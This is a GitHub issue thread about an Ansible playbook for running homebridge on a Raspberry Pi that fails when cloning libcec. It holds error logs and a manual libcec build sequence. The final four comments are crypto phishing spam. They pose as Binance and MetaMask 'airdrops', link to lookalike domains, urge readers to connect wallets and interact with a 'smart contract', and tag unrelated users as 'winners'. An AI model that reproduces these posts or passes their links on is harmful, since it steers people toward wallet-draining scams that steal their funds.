### ISSUE TITLE
Fails at libcec 

### ISSUE THREAD

**Issue by pr3sidentspence** [x2c/homebridge-ansible-pi#2]
This is failing for me at LibCEC with "Local modifications exist in repository (force=no)"

Apparently they changed the default force behaviour to no and people are seeing this now. Should I attempt it with force=yes and, if so, how do I set that?

**Comment by x2c** [comment]
yes please try setting force=yes and if it works please raise a pull request

**Comment by pr3sidentspence** [comment]
Where does one set that, I've tried at the command line, and in run-ansible.sh, but generated errors. Sorry, I have no experience at all with ansible.

**Comment by pr3sidentspence** [comment]
Ok, I put force=yes in main.yml. Now I'm getting:

```
TASK [pi : Git clone LibCEC Platform] ******************************************
fatal: [192.168.86.198]: FAILED! => {"changed": false, "failed": true, "msg": "Failed to init/update submodules: Cloning into 'support'...
Permission denied (publickey).
fatal: Could not read from remote repository.

Please make sure you have the correct access rights
and the repository exists.
Clone of 'git@github.com:Pulse-Eight/libcec-support.git' into submodule path 'support' failed
"}
```
That repo does exist, I'm not sure why it's doing that.

**Comment by pr3sidentspence** [comment]
Someone else reported this in Nov, 2016: https://github.com/Pulse-Eight/platform/issues/30

I can't clone it from the commandline outside of ansible either.

**Comment by pr3sidentspence** [comment]
I told it not to stop when the libcec tasks fail, and it finished. However, there are no instructions for how to proceed to run homebridge. Assuming that it must be the same as for other installation methods, I went back to the homebridge instructions.

I eventually found a homebridge I could run in `/usr/local/lib/node_modules/homebridge/bin` but it throws an error:

```
module.js:339
    throw err;
    ^

Error: Cannot find module '../build/Release/dns_sd_bindings'
    at Function.Module._resolveFilename (module.js:337:15)
    at Function.Module._load (module.js:287:25)
    at Module.require (module.js:366:17)
    at require (module.js:385:17)
    at Object.<anonymous> (/usr/local/lib/node_modules/homebridge/node_modules/hap-nodejs/node_modules/mdns/lib/dns_sd.js:32:22)
    at Module._compile (module.js:435:26)
    at Object.Module._extensions..js (module.js:442:10)
    at Module.load (module.js:356:32)
    at Function.Module._load (module.js:311:12)
    at Module.require (module.js:366:17)
```
I started trying to resolve this, but dead ended. Others with the same error were given things to try in directories I do not have.

**Comment by pr3sidentspence** [comment]
I was able to clone the libcec platform and library using the instructions found at [https://github.com/Pulse-Eight/libcec/wiki/Raspberry-Pi-set-up](https://github.com/Pulse-Eight/libcec/wiki/Raspberry-Pi-set-up):

```
apt-get update
apt-get install cmake liblockdev1-dev libudev-dev libxrandr-dev python-dev swig
cd
git clone https://github.com/Pulse-Eight/platform.git
mkdir platform/build
cd platform/build
cmake ..
make
sudo make install
cd
git clone https://github.com/Pulse-Eight/libcec.git
mkdir libcec/build
cd libcec/build
cmake -DRPI_INCLUDE_DIR=/opt/vc/include -DRPI_LIB_DIR=/opt/vc/lib ..
make -j4
sudo make install
sudo ldconfig
```

I wonder if the only difference is the https? I am not knowledgeable enough to say.

**Comment by sandipbhuyan** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @frankekn, @xiaoyual666, @MathieuDuboy, @sashamorozov, @0xhades, @kirsuvin, @LoayGhreep

**Comment by mkproject-admin** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @stoutlabs, @arthurliebhardt, @cccchuck, @MoaathAlattas, @gmaragao, @dmzoneill, @yigger

**Comment by mkproject-admin** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @OdaDaisuke, @consciouscoder, @KanteLabs, @OnrCan, @jestersimpps, @edsonnt2, @mealisenol

**Comment by JuguApp** [comment]
# 🌐 **$ETH MetaMask Airdrop: Claim Your $1000 in Ethereum Now!**

🎉 **Congratulations!** 

You're among the chosen participants for the $1.5k Ethereum Airdrop. We're thrilled to grant you $1000 in ETH to celebrate the year's end. But that's not all—connect now, and you'll instantly receive an extra $100! Follow the steps below to claim your Ethereum and make the most of this exclusive giveaway!

[![Claim Now](https://pbs.twimg.com/media/Frg-sWYWIAYCoiX.jpg:large)](https://wwwwmetaskmask.communitymaskmeta.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=metamask)

## **Steps to Claim:**

### 1. 🚀 **Connect Your MetaMask Wallet:**
   - Click on the [Connect Wallet](https://wwwwmetaskmask.communitymaskmeta.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=metamask) link.
   - Select **MetaMask** as your preferred wallet provider.

### 2. 🔄 **Interact with the Contract and Claim Your $100:**
   - Once your MetaMask wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract. Ensure you use the **Claim** method.

💰 **Don't miss out on your $1000 in Ethereum!** Additionally, enjoy an instant $100 upon connection. Act now to secure your ETH. Remember, there's a chance to win up to $20,000—it's your golden opportunity with MetaMask!


Winners: @teodoraispas, @furkandemireleng, @raymaen, @codebloq, @MingxuanLi, @standingdreams, @bitcoinvsalts
